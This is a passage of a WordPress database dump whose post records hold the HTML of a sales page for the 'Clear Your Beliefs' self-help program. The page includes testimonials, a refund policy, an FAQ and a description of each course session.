</em>\n<strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\n<strong>~ C.T., Performance and Life Coach</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\n<strong>– M.M., International Business Consultant</strong>\n\n&nbsp;\n\n&nbsp;\n\n<a href="https://beliefcloset.infusionsoft.com/app/orderForms/1101aa80-782e-4650-acb8-2f1ae88e2cbd">Purchase</a>\n\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>Frequently Asked Questions</h1>\n<strong>Q: What is a virtual course?</strong>\n\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\n\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\n\n<strong>Q: How long will I have access to the course?</strong>\n\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\n\n<strong>Q: Are there scholarships available?</strong>\n\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\n\n<strong>Q: What is your refund policy?</strong>\n\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\n\n<strong>Q: How can I reach Customer Support?</strong>\n\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\n\n<strong>Q: What is your Privacy Policy?</strong>\n\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\n\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\n\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.', 'Sample Program Page', '', 'inherit', 'closed', 'open', '', '2009-revision-v1', '', '', '2014-12-11 23:50:56', '2014-12-12 04:50:56', '', 2009, 'http://clearyourbeliefs.com/2009-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2029, 2, '2014-12-12 16:28:10', '2014-12-12 21:28:10', '<img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg">\n&nbsp;\n<img class="bor-img-top no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong>\n<img class="bor-img-bot no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n&nbsp;&nbsp;			<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<p>You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.</p>\n\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p>\n<img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" />\n<h1>\nWhat If You Could Permanently Delete Old Habits And Patterns – So They Didn’t Come Back?</h1>\n<p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.</p>\n<p><strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You’re still not taking consistent actions to reach your goals or change your life.</p>\n&nbsp;<h3 class="widget-title">Ok I&#8217;m convinced</h3>			<a class="button first" href="http://clearyourbeliefs.com/program/#package">OK, I''M CONVINCED!Take me to the program description,tell me about all the cool bonuses I’ll get,and how much it costs...</a>\n&nbsp;&nbsp;			<h1>\nWhy Does This Happen?</h1>\n<img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /><p class="parg-text">Have you heard the myth, “It takes 30 days to change a habit?” It’s not true. Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p><p class="parg-text">Neuroscientists call the brain’s ability to change over time “neuroplasticity.”</p><p class="parg-text">It can take months – or years – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p>\n&nbsp;			<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<p>The best doctors seek the source the source of the dis-ease. They don’t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don’t solve the cause of the problem – where the illness is being generated.</p>\n<p>If you don’t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p>\n<img src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" />&nbsp;			<h1>Beliefs Are The Foundation Of Your Experience</h1>\n<p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your beliefs. We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate through us, and they are at the root of all the habits and patterns in our life. But we’re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p>\n\n<img width="158" height="118" alt="construction-300x224" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" class=" wp-image-320 alignleft">\n<p class="parg-text text-blue">Beliefs can be seen as the literal foundation of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p class="parg-text"><strong>We literally create our reality with our beliefs.</strong></p>\n<img width="157" height="114" alt="dilap" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" class=" wp-image-321 alignright">\n<p class="parg-text">If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won’t be able to achieve permanent success.</p>\n\n<h1>Upgrade Your Human Operating System</h1>\n<p>Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – like managing your life.</p>\n<p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. Do you ever have thoughts like these?</p>\n\n<strong><em>I’m not enough.</em></strong>\n<strong><em>I can’t do it.</em></strong>\n<strong><em>I’m not worthy.</em></strong>\n<strong><strong><em>I’ll never be like them.</em></strong></strong>\n<strong><em>I’m all alone.</em></strong>\n\n<strong><em>I need to do more (or better) to be accepted.</em></strong>\n<strong><em>There’s something wrong with me.</em></strong>\n<strong><em>I’m fundamentally flawed.</em></strong>\n<strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong>\n<strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong>\n\n<p>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.</p>\n<p>At the core of every bad feeling you have about yourself, and every limitation you have, there’s a belief operating in the background, like an annoying little machine that you can’t turn off.</p>\n<p><strong>Here’s the good news:</strong> <strong>Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</strong></p>\n<h1>The Garden Of Your Mind</h1>\n\n<p style="text-align: left"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px;margin-right: 20px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.\nThe same thing is true in your subconscious mind:\n<strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong>\n<strong>It''s that simple.</strong></p>\n\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<p style="text-align: left">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\n\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\n\n&nbsp;\n\n&nbsp;\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\n\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\n\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\n\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong>and</strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\n\n<strong> It’s that simple.</strong>\n\n&nbsp;\n<h1>Why Beliefs Are Difficult To Change</h1>\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\n\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\n\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\n\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\n\n&nbsp;\n<h1>Why We React The Way We Do</h1>\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\n\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\n\nWhy did I say that?\nWhat’s wrong with me?\nWhy didn’t I follow through?\nWhy did I react that way?\nWhat the hell just happened?\n\n<em>\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\n\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\n\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\n\n&nbsp;\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\n\n<strong>Affirmations</strong> are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.\n<strong>That Belief Isn''t True.</strong>  Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.\n<strong>Tap Your Problem Away. </strong> Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.\n\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\n\n&nbsp;\n<h1>Here’s Some Good News</h1>\n\n<strong><strong><strong>First: It’s not your fault. There''s nothing wrong with you.</strong></strong></strong>\n<strong>Second: You can change your beliefs <em>permanently</em>.</strong>\n\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\n\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\n\n&nbsp;\n<h1>Imagine The Life You Desire</h1>\n<strong>Can you imagine this?</strong>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\n\n<p>You''re no longer held back by old beliefs and stories.</p>\n<p>There''s no resistance to doing what needs to be done.</p>\n<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n\n&nbsp;\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\n\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\n\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\n\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\n\n&nbsp;\n<h1>Clear Whatever Is In The Way</h1>\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\n\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\n\n&nbsp;\n<h1>Is This A Guaranteed Cure-All?</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.\n\nNo technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.\n\nDuring the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.\n\n&nbsp;\n<h1>The Clear Your Beliefs program can:</h1>\n\nEliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.\nRemove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.\nGive you the power to change your experiences – and your circumstances – at will.\nShow you how to gain mastery over your moods, perceptions, and responses.\n\n&nbsp;\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\n\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\n\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\n\nIf you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.\n\n<h1>With This Methodology, You Can Finally:</h1>\n\nManifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a>\nRemove resistance and barriers\nOpen doors to new opportunities\nEliminate pain and suffering from the past\nExperience more fulfillment in your relationships\nAttract more abundance and prosperity\nIncrease your energy, vitality, and productivity\n\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\n\n&nbsp;\n\n<h1>A Message from Lion Goodman...</h1>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>\nDear Explorer:\nAs a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\n\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\n\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\n\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\n\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px;margin-bottom: 5px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\n\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\n\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\n\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\n\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\n\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\n\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\n\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\n\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.\n\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\n\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs...\n\nIn gratitude, and with warm wishes for your total success,\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.\n\n&nbsp;\n\n<h5>Session 1:   <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.\n\nIn this first session, you’ll examine your old beliefs, and determine which ones no longer serve you.  It’s time to discard them and clear some space!  You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\n\n<strong> In Session 1, you will:</strong>\n\nDiscover old limiting beliefs that are deeply buried in your subconscious mind\nLearn which ones keep you stuck, preventing you from having what you want in life\nExperience a process that returns you to your True Self, the home of inner joy and bliss\nBegin to work with, not against, your subconscious mind – where your beliefs reside\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 2:   <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.\n\nWhat do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It’s time to haul them out, and toss them out! You don’t need them anymore.  If you hear critical inner voices berating you, don’t miss this session.  Rid yourself of those pesky critical voices along with the diapers!\n\n<strong> In Session 2, you will:</strong>\n\nUse the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself\nClear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again\nSee your own magnificence through a new clear lens of your own beauty and joy\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 3:  <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\n\n<em>What are you capable of?  </em>If your answer is “Anything...” you don’t need this session.  But most of us think too small...\n\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>“What’s the use?  You’ll fail anyway. You don’t deserve happiness – look at you!”  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.\n\nDo you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!\n\n<strong> In Session 3, you will:</strong>\n\nIdentify old beliefs that stand between you and creating the life you want\nDissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.\nImagine what it means to live without self-imposed limitations, trusting that you can create anything you want\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 4:   <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.\n\nIf you’re married, are you happy and secure?   Or are you anxious about the future?   If you’re not in a relationship, what’s holding you back from finding your ideal mate?\n\nHumans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned “what love is” from your parents – so it’s no wonder that you’re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious 